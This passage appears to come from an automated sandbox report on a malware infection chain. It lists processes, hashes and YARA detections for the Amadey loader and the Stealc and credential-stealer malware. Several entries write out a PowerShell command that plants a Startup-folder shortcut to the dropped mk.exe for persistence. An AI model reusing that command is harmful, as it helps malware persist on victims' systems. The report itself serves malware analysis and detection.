Start date:	13/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6588 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:40:04
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECBGCGCGI.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:40:04
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:40:04
Start date:	13/11/2024
Path:	C:\Users\user\DocumentsKECBGCGCGI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DocumentsKECBGCGCGI.exe"
Imagebase:	0x620000
File size:	3'278'336 bytes
MD5 hash:	0A25084685B54B88100D89D2BF1FB4DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.2763202923.0000000000621000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:40:11
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x780000
File size:	3'278'336 bytes
MD5 hash:	0A25084685B54B88100D89D2BF1FB4DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.2790671022.0000000000781000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:40:36
Start date:	13/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	14:41:00
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x780000
File size:	3'278'336 bytes
MD5 hash:	0A25084685B54B88100D89D2BF1FB4DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	14:41:12
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006034001\mk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Imagebase:	0x400000
File size:	9'308'672 bytes
MD5 hash:	B56761AD16C0E1CDD4765A130123DBC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	14:41:13
Start date:	13/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:41:13
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:41:18
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe"
Imagebase:	0xe70000
File size:	3'180'032 bytes
MD5 hash:	2EB7DD5FC174EA7CE691BA15A1E34BA4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 34%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:41:23
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe"
Imagebase:	0x690000
File size:	1'799'168 bytes
MD5 hash:	F8D1D73A4B017AE508EE5172F7601906
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000002.3502627065.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000002.3501473948.0000000000691000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000003.3461206243.0000000005040000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:41:25
Start date:	13/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6668 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:41:28
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:
File size:	3'278'336 bytes
MD5 hash:	0A25084685B54B88100D89D2BF1FB4DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	14:41:30
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe"
Imagebase:	0xe70000
File size:	3'180'032 bytes
MD5 hash:	2EB7DD5FC174EA7CE691BA15A1E34BA4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3635881339.000000000180B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3570296328.0000000001804000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3628606604.0000000001805000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3576014909.0000000001804000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3592012775.0000000001806000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3628353430.0000000001804000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3610517200.0000000001804000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3593717445.0000000001804000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.3636048689.0000000001812000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:41:38
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe"
Imagebase:	0xcd0000
File size:	2'811'904 bytes
MD5 hash:	39307DB79B786D76D1B6070FEC77BC0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	14:41:38
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe"
Imagebase:	0x690000
File size:	1'799'168 bytes
MD5 hash:	F8D1D73A4B017AE508EE5172F7601906
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000002.3671582881.0000000000691000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000003.3612721796.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	14:41:47
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe"
Imagebase:	0xe70000
File size:	3'180'032 bytes
MD5 hash:	2EB7DD5FC174EA7CE691BA15A1E34BA4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3779914099.00000000019BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3825982133.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3826632372.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3779631003.00000000019BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3797636503.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3757488399.00000000019BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	14:41:53
Start date:	13/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=06d4af6f50.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	14:41:53
Start date:	13/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1932,i,3331334219866744082,9908711228420436626,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	14:41:54
Start date:	13/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1932,i,3331334219866744082,9908711228420436626,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	14:41:55
Start date:	13/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=7200 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	14:41:56
Start date:	13/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	14:42:02
Start date:	13/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=06d4af6f50.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	14:42:02
Start date:	13/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2004,i,16542196128712413035,6569779122986016957,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	14:42:12
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006034001\mk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Imagebase:	0x400000
File size:	9'308'672 bytes
MD5 hash:	B56761AD16C0E1CDD4765A130123DBC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	14:42:12
Start date:	13/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yiuq.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	14:42:12
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	14:42:25
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe"
Imagebase:	0xa00000
File size:	2'811'904 bytes
MD5 hash:	39307DB79B786D76D1B6070FEC77BC0B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	14:42:33
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006034001\mk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Imagebase:	0x400000
File size:	9'308'672 bytes
MD5 hash:	B56761AD16C0E1CDD4765A130123DBC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	14:42:33
Start date:	13/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zzvy.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	14:42:33
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	14:42:36
Start date:	13/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3388 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	14:42:46
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006034001\mk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Imagebase:	0x400000
File size:	9'308'672 bytes
MD5 hash:	B56761AD16C0E1CDD4765A130123DBC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	14:42:47
Start date:	13/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dslm.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	14:42:47
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	14:43:00
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006034001\mk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Imagebase:	0x400000
File size:	9'308'672 bytes
MD5 hash:	B56761AD16C0E1CDD4765A130123DBC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	14:43:00
Start date:	13/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tytb.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	14:43:00
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	14:43:13
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006034001\mk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Imagebase:	0x400000
File size:	9'308'672 bytes
MD5 hash:	B56761AD16C0E1CDD4765A130123DBC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	14:43:13
Start date:	13/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\akdz.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	14:43:13
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	14:43:26
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006034001\mk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Imagebase:	0x400000
File size:	9'308'672 bytes
MD5 hash:	B56761AD16C0E1CDD4765A130123DBC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	false

Show Windows behavior

Target ID:	59
Start time:	14:43:26
Start date:	13/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kncs.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	14:43:26
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	14:43:39
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006034001\mk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Imagebase:	0x400000
